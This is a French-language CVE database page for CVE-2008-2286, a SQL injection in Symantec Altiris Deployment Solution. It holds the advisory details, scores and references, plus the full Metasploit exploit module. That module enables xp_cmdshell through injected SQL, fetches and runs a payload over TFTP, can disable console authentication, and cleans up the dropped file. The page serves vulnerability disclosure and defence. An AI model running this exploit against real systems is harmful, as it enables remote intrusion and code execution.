CVE-2008-2286 : Détail

CVE-2008-2286

SQL Injection
A03-Injection
82.39%V3
Network
2008-05-18
12h00 +00:00
2018-10-11
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

SQL injection vulnerability in axengine.exe in Symantec Altiris Deployment Solution 6.8.x and 6.9.x before 6.9.176 allows remote attackers to execute arbitrary SQL commands via unspecified string fields in a notification packet.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 29552

Date de publication : 2013-11-12 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Symantec Altiris DS SQL Injection', 'Description' => %q{ This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8 to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize numeric input fields in "UpdateComputer" notification Requests. In order to spawn a shell, several SQL injections are required in close succession, first to enable xp_cmdshell, then retrieve the payload via TFTP and finally execute it. The module also has the capability to disable or enable local application authentication. In order to work the target system must have a tftp client available. }, 'Author' => [ 'Brett Moore', # Vulnerability discovery '3v0lver' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2008-2286' ], [ 'OSVDB', '45313' ], [ 'BID', '29198'], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-024' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Targets' => [ [ 'Windows 2003 (with tftp client available)', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ] ], 'Privileged' => true, 'Platform' => 'win', 'DisclosureDate' => 'May 15 2008', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(402), OptBool.new('XP_CMDSHELL', [ true, "Enable xp_cmdshell prior to exploit", true]), OptBool.new('DISABLE_SECURITY', [ true, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]), OptBool.new('ENABLE_SECURITY', [ true, "Enable Local Deployment Console Authentication", false ]) ], self.class) end def execute_command(cmd, opts = {}) inject=[] if @xp_shell_enable inject+=[ "#{Rex::Text.to_hex("sp_configure \"show advanced options\", 1; reconfigure",'')}", "#{Rex::Text.to_hex("sp_configure \"xp_cmdshell\", 1; reconfigure",'')}", ] @xp_shell_enable = false end if @wc_disable_security inject+=["#{Rex::Text.to_hex("wc_upd_disable_security",'')}"] @wc_disable_security = false end if @wc_enable_security inject+=["#{Rex::Text.to_hex("wc_upd_enable_security",'')}"] @wc_enable_security = false end inject+=["#{Rex::Text.to_hex("master.dbo.xp_cmdshell \'cd %TEMP% && cmd.exe /c #{cmd}\'",'')}"] if cmd != nil inject.each do |sqli| send_update_computer("2659, null, null;declare @querya VARCHAR(255);select @querya = 0x#{sqli};exec(@querya);--") end end def send_update_computer(processor_speed) notification = %Q|Request=UpdateComputer OS-Bit=32 CPU-Arch=x86 IP-Address=192.168.20.107 MAC-Address=005056C000AB Name=Remove_test OS=Windows XP Version=2.6-38 (32-Bit) LoggedIn=Yes Boot-Env=Automation Platform=Linux Agent-Settings=Same Sys-Info-TimeZoneBias=0 Processor=Genuine Intel Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz Processor-Speed=#{processor_speed} \x00 | connect sock.put(notification) response = sock.get_once() disconnect return response end def check res = send_update_computer("2659") unless res and res =~ /Result=Success/ and res=~ /DSVersion=(.*)/ return Exploit::CheckCode::Unknown end version = $1 unless version =~ /^6\.(\d+)\.(\d+)$/ return Exploit::CheckCode::Safe end print_status "#{rhost}:#{rport} - Altiris DS Version '#{version}'" minor = $1.to_i build = $2.to_i if minor == 8 if build == 206 || build == 282 || build == 378 return Exploit::CheckCode::Vulnerable elsif build < 390 return Exploit::CheckCode::Appears end elsif minor == 9 and build < 176 #The existence of versions matching this profile is a possibility... none were observed in the wild though #as such, we're basing confidence off of Symantec's vulnerability bulletin. return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit @wc_disable_security = datastore['DISABLE_SECURITY'] @wc_enable_security = datastore['ENABLE_SECURITY'] @xp_shell_enable = datastore['XP_CMDSHELL'] # CmdStagerVBS was tested here as well, however delivery took roughly # 30 minutes and required sending almost 350 notification messages. # size constraint requirement for SQLi is: linemax => 393 execute_cmdstager({ :delay => 1.5, :temp => '%TEMP%\\'}) end def on_new_session(client) return if not payload_exe #can't scrub dropped payload while the process is still active so... #iterate through process list, find our process and the associated #parent process ID, Kill the parent. #This module doesn't use FileDropper because of timing issues when #using migrate -f and FileDropper. On the other hand PrependMigrate #has been avoided because of issues with reverse_https payload #SeeRM#8365 https://http://dev.metasploit.com/redmine/issues/8365 unless client.type == "meterpreter" print_error("Automatic cleanup only available with meterpreter, please delete #{payload_exe} manually") return end client.core.use("stdapi") unless client.ext.aliases.include?("stdapi") # migrate print_status("Migrating ...") client.console.run_single("run migrate -f") # kill the parent process so the payload can hopefully be dropped print_status("Kill parent process ...") client.sys.process.get_processes().each do |proc| if proc['pid'] == client.sys.process.open.pid client.sys.process.kill(proc['ppid']) end end win_temp = client.fs.file.expand_path("%TEMP%") win_file = "#{win_temp}\\#{payload_exe}" print_status("Attempting to delete #{win_file} ...") client.shell_command_token(%Q|attrib.exe -r #{win_file}|) client.fs.file.rm(win_file) print_good("Deleted #{win_file}") end end

Products Mentioned

Configuraton 0

Symantec>>Altiris_deployment_solution >> Version 6.8

Symantec>>Altiris_deployment_solution >> Version 6.9

Références

http://www.securityfocus.com/bid/29198
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=bugtraq&m=122167472229965&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=122167472229965&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.exploit-db.com/exploits/29552
Tags : exploit, x_refsource_EXPLOIT-DB
http://osvdb.org/show/osvdb/45313
Tags : vdb-entry, x_refsource_OSVDB
http://www.securitytracker.com/id?1020024
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/30261
Tags : third-party-advisory, x_refsource_SECUNIA